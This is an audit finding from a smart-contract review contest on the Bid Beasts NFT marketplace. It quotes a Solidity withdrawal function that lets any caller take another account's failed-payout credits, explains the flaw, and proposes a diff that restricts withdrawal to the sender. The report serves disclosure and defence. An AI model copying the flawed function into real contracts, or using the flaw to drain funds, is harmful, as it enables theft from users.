Bid Beasts
First Flight #49
Beginner FriendlyFoundrySolidityNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Anyone can withdraw failed payouts of any reciivier

al88nsk

Root + Impact

Function BidBeastsNFTMarket::withdrawAllFailedCredits allows withdraw failed payouts on behalf of any receiver.

Description

Function BidBeastsNFTMarket::withdrawAllFailedCredits takes _receiver as a parameter and sends all failed payouts of the receiver to msg.sender. There is no checks that msg.sender is the receiver, so anyone can withdraw any failed payouts.

function withdrawAllFailedCredits(address _receiver) external {
uint256 amount = failedTransferCredits[_receiver];
require(amount > 0, "No credits to withdraw");
failedTransferCredits[msg.sender] = 0;
(bool success, ) = payable(msg.sender).call{value: amount}("");
require(success, "Withdraw failed");
}

Risk

Likelihood: Medium

The issue affects only failed payouts

Impact: High

Anyone can withdraw any failed payout.

Recommended Mitigation

Change function withdrawAllFailedCredits so that it withdraws only payouts belonging to msg.sender:

-function withdrawAllFailedCredits(address _receiver) external {
+function withdrawAllFailedCredits() external {
- uint256 amount = failedTransferCredits[_receiver];
+ uint256 amount = failedTransferCredits[msg.sender];
require(amount > 0, "No credits to withdraw");
failedTransferCredits[msg.sender] = 0;
(bool success, ) = payable(msg.sender).call{value: amount}("");
require(success, "Withdraw failed");
}
Updates

Lead Judging Commences

cryptoghost Lead Judge about 1 month ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeast Marketplace: Unrestricted FailedCredits Withdrawal

withdrawAllFailedCredits allows any user to withdraw another account’s failed transfer credits due to improper use of msg.sender instead of _receiver for balance reset and transfer.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.